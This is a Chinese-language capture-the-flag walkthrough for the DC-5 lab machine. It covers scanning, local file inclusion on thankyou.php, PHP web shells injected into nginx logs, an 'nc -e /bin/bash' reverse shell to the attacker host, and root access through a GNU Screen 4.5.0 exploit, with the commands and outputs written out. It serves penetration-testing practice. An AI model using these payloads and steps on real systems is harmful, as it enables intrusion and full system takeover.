靶机介绍

这次的靶机渗透实战是一个找寻靶机中的flag的过程，并以获得最终的flag为目标。
靶机下载地址:http://www.five86.com/dc-5.html

信息搜集

直接上nmap进行扫描

nmap -sV -A -p- 172.16.0.17

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

Nmap scan report for localhost (172.16.0.17) Host is up (0.00029s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 80/tcp open http nginx 1.6.2 |_http-server-header: nginx/1.6.2 |_http-title: Welcome 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 41519/tcp6 status | 100024 1 46625/udp6 status | 100024 1 53363/udp status |_ 100024 1 59243/tcp status 59243/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:A7:4E:87 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.29 ms localhost (172.16.0.17) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.20 seconds

可知开放111、80、59243端口，linux主机 猜测从web页面拿到shell

渗透实战

1. 直接先扫目录

   dirb http://172.16.0.17/ -X .php -S

   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

   URL_BASE: http://172.16.0.17/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt OPTION: Silent Mode EXTENSIONS_LIST: (.php) | (.php) [NUM = 1] ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://172.16.0.17/ ---- + http://172.16.0.17/about-us.php (CODE:200|SIZE:4292) + http://172.16.0.17/contact.php (CODE:200|SIZE:4282) + http://172.16.0.17/faq.php (CODE:200|SIZE:5645) + http://172.16.0.17/footer.php (CODE:200|SIZE:17) + http://172.16.0.17/index.php (CODE:200|SIZE:4025) + http://172.16.0.17/solutions.php (CODE:200|SIZE:4100) + http://172.16.0.17/thankyou.php (CODE:200|SIZE:852) -----------------

• footer.php每次访问时间都不一样
  
• file参数是可以通过目录字典burp爆破出来，但file常见直接手动就可试出
• 验证是否存在文件包含
  

2. 反弹bash

• 查看nginx日志,发现会实时记录
  
• 将phpinfo写入日志

  http://172.16.0.17/<?php phpinfo(); ?>

• 验证是可以执行的
  
• 将mm写入日志,passthru - 执行外部程序并显示原始输出

  http://172.16.0.17/<?php passthru($_GET[‘hh’]); ?>

• 直接nc反弹bash

  http://172.16.0.17/thankyou.php?file=/var/log/nginx/access.log&hh=nc%20-e%20/bin/bash%20172.16.0.10%202222

  1 2 3 4 5

  root@bbkali:~# nc -lvp 2222 listening on [any] 2222 ... connect to [172.16.0.10] from localhost [172.16.0.17] 41208 pwd /var/www/html

• 用python建立交互模式

  python -c “import pty;pty.spawn(‘/bin/bash’)”

• 查看权限发现screen-4.5.0特殊文件

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

  find / -perm -u=s -type f 2>/dev/null /bin/su /bin/mount /bin/umount /bin/screen-4.5.0 /usr/bin/gpasswd /usr/bin/procmail /usr/bin/at /usr/bin/passwd /usr/bin/chfn /usr/bin/newgrp /usr/bin/chsh /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/sbin/exim4 /sbin/mount.nfs

3. 提权

• 查询screen-4.5.0的利用脚本,发现存在

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

  root@bbkali:/tmp/dc5# searchsploit screen 4.5 --------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) --------------------------------------- ---------------------------------------- GNU Screen 4.5.0 - Local Privilege Esc | exploits/linux/local/41152.txt GNU Screen 4.5.0 - Local Privilege Esc | exploits/linux/local/41154.sh --------------------------------------- ---------------------------------------- Shellcodes: No Result root@bbkali:/tmp/dc5# searchsploit -m 41154.sh Exploit: GNU Screen 4.5.0 - Local Privilege Escalation URL: https://www.exploit-db.com/exploits/41154 Path: /usr/share/exploitdb/exploits/linux/local/41154.sh File Type: Bourne-Again shell script, ASCII text executable, with CRLF line terminators Copied to: /tmp/dc5/41154.sh

• 根据文件说明编译文件

• 在本地搭建共享服务

  python -m SimpleHTTPServer 8080
  

• 通过wget下载exp,发现没有权限

  wget http://172.16.0.10:8080/run.sh

• 借助antsword使用wget功能,将新mm植入再用中国蚁剑连接

  echo ‘<?php @eval($_GET[cmd]);?>’ >> /var/log/nginx/error.log

• 通过ftp进行上传下载,特别注意要在tmp文件目录下才有ftp访问权限

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

  # 安装ftp apt-get install vsftpd # 启动服务 service vsftpd start # 创建用户 useradd ftpuser passwd ftpuser mkdir /home/ftpuser chmod 777 /home/ftpuser/ cp /tmp/dc5/* /home/ftpuser/ ----- # 连接ftp ftp ip－address 　　输入用户名和密码 put #发送文件 　　local-file: path 　　remote-file: path get #接收文件 　　local-file: path 　　remote-file: path

• 执行run.sh提权

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

  www-data@dc-5:/tmp$ ls ls libhax.so rootshell run.sh www-data@dc-5:/tmp$ chmod +x run.sh chmod +x run.sh www-data@dc-5:/tmp$ ./run.sh ./run.sh [+] Now we create our /etc/ld.so.preload file... [+] Triggering... ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. [+] done! No Sockets found in /tmp/screens/S-www-data. # whoami whoami root

• 获取到最终flag

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

  # cat thisistheflag.txt cat thisistheflag.txt 888b 888 d8b 888 888 888 888 8888b 888 Y8P 888 888 888 888 88888b 888 888 888 888 888 888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 888 888 888 888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 888 888 888 888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8P Y8P Y8P 888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " " 888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 888 888 888 Once again, a big thanks to all those who do these little challenges, and especially all those who give me feedback - again, it's all greatly appreciated. :-) I also want to send a big thanks to all those who find the vulnerabilities and create the exploits that make these challenges possible.